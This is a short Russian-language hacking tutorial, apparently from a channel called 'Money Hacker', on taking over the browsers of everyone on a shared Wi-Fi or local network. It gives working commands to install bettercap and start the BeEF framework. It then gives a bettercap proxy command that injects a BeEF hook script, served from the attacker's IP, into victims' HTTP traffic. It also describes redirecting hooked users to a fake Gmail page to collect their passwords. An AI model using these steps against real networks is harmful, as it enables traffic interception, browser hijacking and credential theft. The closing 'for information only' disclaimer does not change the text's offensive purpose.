Массовый взлом любых устройств в сети

Всем привет! Сегодня расскажу как можно похакать любые устройства в вашей сетке, и сделать это массово.

Итак нам понадобится :

- Kali Linux

- beef-xss framework

- bettercap

Установим bettercap на Kali Linux:

Код:

apt install build-essential ruby-dev libpcap-dev net-tools

gem install bettercap 

Beef в Kali уже установлен. Запускаем beef. Логин beef, пароль beef.

Код:

service beef-xss start 

Если проблемы с авторизацией, запускаем из папки:

Код:

cd /usr/share/beef ./beef 

Подключаемся к любой вай-фай сети. Работает и в локалке, но не суть.

Запускаем bettercap:

Код:

bettercap --proxy --proxy-module injects --js-url "http://192.168.57.128:3000/hook.js" 

Указываем ваш ip. Почему не локалхост думаю понятно. Тут происходит инжект скрипта beef‘а. Снифаем траффик, подстраиваемся под запрос, встраиваем скрипт и отправляем обратно тому кто сделал запрос.

Работает, если человек зашел на страницу без ssl, т.е по протоколу http. Как только он закроет страницу, связь с ним пропадает.

Все браузеры-зомби которые подцепил beef отобразятся в меню слева. Пока они онлайн, можно использовать различные модули и экплоиты на них. Beef содержит множество модулей. Вам остается только подобрать нужные для ваших векторов атак. Все зависит от браузера и то в каких контекстах безопасности он находится. Каждый контекст может обеспечивать набор уникальных векторов атак.

Например, можно направить пользователя на фейк gmail. Выбираем нужный модуль, жмем execute.

У пользователя-зомби произойдет редирект на фейк. Если он введет свой логин и пароль, то они отобразятся у нас в панели.

На этом все. Спасибо за внимание.

Данная статья создана исключительно для ознакомления и не призывает к действиям!

*************************************************************************

Money Hacker - ПОДПИШИСЬ!